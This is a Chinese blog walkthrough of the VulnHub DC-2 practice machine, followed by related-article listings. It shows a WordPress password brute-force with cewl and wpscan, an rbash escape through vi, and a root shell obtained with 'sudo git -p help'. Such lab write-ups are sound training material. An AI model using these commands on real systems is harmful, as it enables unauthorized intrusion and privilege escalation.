VulnHub——DC-2

最新推荐文章于 2024-03-21 11:40:55 发布
最新推荐文章于 2024-03-21 11:40:55 发布
阅读量128 收藏
点赞数
分类专栏: VulnHub 文章标签: 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37043565/article/details/111959046
版权

DC-2

靶机链接
难度:初学者
任务:获取root权限,5个flag
需修改hosts文件
将“192.168.50.90 dc-2”添加到hosts文件。

信息搜集

使用Nmap探测存活主机。
在这里插入图片描述
扫描靶机端口

-A:同时打开操作系统指纹和版本检测
(-O和-osscan-guess也可以探测系统信息)
-Pn:非ping扫描,不执行主机发现,可以绕过防火墙
-sV:查找主机服务版本号
-oN:将结果输出为指定文件

在这里插入图片描述
访问80端口发现flag1,提示使用cewl工具。
在这里插入图片描述

漏洞挖掘与利用

WordPress

使用cewl生成密码字典,并将结果输出为passwd.txt

cewl http://dc-2 -w passwd.txt

使用wpscan进行爆破密码

wpscan --url http://dc-2 --enumerate u -P passwd.txt

爆破出账号密码
登录搜集信息,发现新的flag
在这里插入图片描述
提示使用另一种方法在这里插入图片描述

SSH

获取到tom、jerry两个用户的密码
尝试ssh链接
登录tom后发现flag3,cat命令不能使用。

在这里插入图片描述
英语比较渣,大概是说这个用户没用

登录jerry,无法登录
尝试从tom用户su到jerry,由于tom为rbash用户,尝试绕过
使用vi命令进行绕过

vi
:set shell=/bin/sh
:shell

发现绕过之后仍然无法执行大多数命令
尝试将变量输出为全绝变量

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

在这里插入图片描述
发现flag4,最后有git outta here,搜索后发现可以通过git命令提权。
在这里插入图片描述

sudo git -p help
!/bin/bash

在这里插入图片描述

Anranaaaa
关注
专栏目录
Vulnhub系列:DC-2
weixin_41064688的博客
01-10 339
Vulnhub系列:DC-2 环境准备: DC-2靶机 Kali linux Vmware或vm box 工具: nmap, wpscan cewl 流程: Nmap进行信息收集 进入页面发现是WordPress,寻找漏洞利用,但需要密码,找到flag1 Cewl生成密码字典 WordPress可以用wpscan扫出安全漏洞数量和用户名加爆破密码 登录网站,找到flag2 然后就通过ssh连接,找...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4828
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
VulnHubDC-2
weixin_39219503的博客
01-30 271
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-2,311/ 题目信息如下 Description Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetra...
Vulnhub DC-2
Pai_Space
01-29 688
首先明确:《中华人民共和国网络安全法》 Description Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it's designed with beginners in mind. Linux skills an.
VulnHub DC-2
烟敛寒林的博客
09-07 378
前言 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机DC2 (VirtualBox) IP:192.168.43.15 攻击机:Kali (VMware) IP:192.168.43.242 说明:同DC1,DC2需要找到5个flag 配置同DC-1 开始 首先查看kali的ip得到192.168.43.242 nmap查看靶机ip得到192.168.43.15 继续nmap嗅探靶机其余信息,发现开放...
VulnHubDC-2
qq_45434762的博客
03-22 408
一个粗糙的端口扫描通过对目标主机进行端口探测,发现只开放了80端口,那就先访问一下看当我们通过IP访问的时候,会自动跳转成 http://dc-2我们需要在/etc/hosts 文件中...
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9134
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4960
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
Vulnhub靶机实战——DC-7
冠霖L的博客
10-29 5034
靶机DC-7下载地址:https://download.vulnhub.com/dc/DC-7.zip 环境:VMware 15虚拟机软件 DC-7靶机IP地址:192.168.220.154 Kali的IP地址:192.168.220.155 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1996
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
[Vulnhub] DC-2
weixin_63231007的博客
01-02 661
DC系列靶机-第二弹(hydra爆破+rbash逃逸+git提权)
Vulnhub DC2
qq_45746876的博客
08-13 380
Vulnhub DC2靶机学习
vulnhub靶场 DC-2
weixin_52221158的博客
08-29 721
vulnhub靶场 DC-2
vulnhub--DC2
weixin_55129870的博客
05-12 1340
环境:kali、DC2靶机 DC2靶机默认桥接模式,开启前改成net模式,保证kali和DC2在同一局域网中。(也可都是桥接模式,我比较习惯net模式) ifconfig查看kaliIP地址:192.168.44.131 查看C段,准备C段扫描,在虚拟机编辑--虚拟网络编辑器中, 得知网段192.168.44.0/24,使用nmap扫描存活主机 nmap -sP 192.168.44.0/24 #扫描IP段的所有IP地址 一般都会扫描出5个存活主机,出去较大的,较小的,得知.
vulnhub靶场之DC-2
qq_58091216的博客
01-07 1083
1)我们使用ssh登录账号,用jerry登录半天登录不上去,我们使用tom进行登录,发现可以登录成功,而且看到了flag3.txt。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权。虚拟机开启之后界面如下(和1一样),我们不知道ip,需要自己探活,网段知道:192.168.52.0/24。与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。添加完成之后,再次访问,访问成功(我们使用kali里面的浏览器)
vulnhub靶机试炼场之DC-2
Mrs_H的博客
10-26 288
前言 距离上次更新靶机渗透的文章已经过了半个月了,这半个月里面一直在打CTF或者是靶场,没有时间做新的靶机。事先说明,这篇靶机的渗透文章是大概一个多月前的作品了。今天刚好有时间,所以就拿出一点时间来整理一下。也当是为了下一个靶机进行复习了。这一个月里面只要没有太多的比赛,漏洞复现去做,应该能更新DC-3吧(应该)。 正文 这次的行文思路不是是跟着flag的次序而是跟着渗透测试过程的来走的。 flag1 先用nmap扫下当前网站up状态的主机,目的是扫出目标靶机 发现主机只是第一步,接下来我们对该靶机进行全
vulnhub靶机dc-2
最新发布
waitagirl的博客
03-21 311
vulnhub靶机dc-2
VulnhubDC-2(新手入门)
zhangshuaiijie的博客
06-12 167
靶机有点难,每个用户的权限都不一样,rbash绕过,git提权。
vulnhub实战 DC-2
weixin_46956745的博客
10-18 269
环境配置 靶机DC-2下载地址:https : //download.vulnhub.com/dc/DC-2.zip DC-2的任务和DC-1基本差不多,都有5个flag,通过提示一步一步 找到flag,最后得到final-flag kali攻击机ip:192.168.217.45 靶机ip:192.168.217.112 实验步骤 1.老套路,首先确定ip地址,以及端口开放状况 arp-scan -l (搜索同一网段上存活主机的IP地址) nmap -sV -p- ip地址(得到端口开放状况) nmap使
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值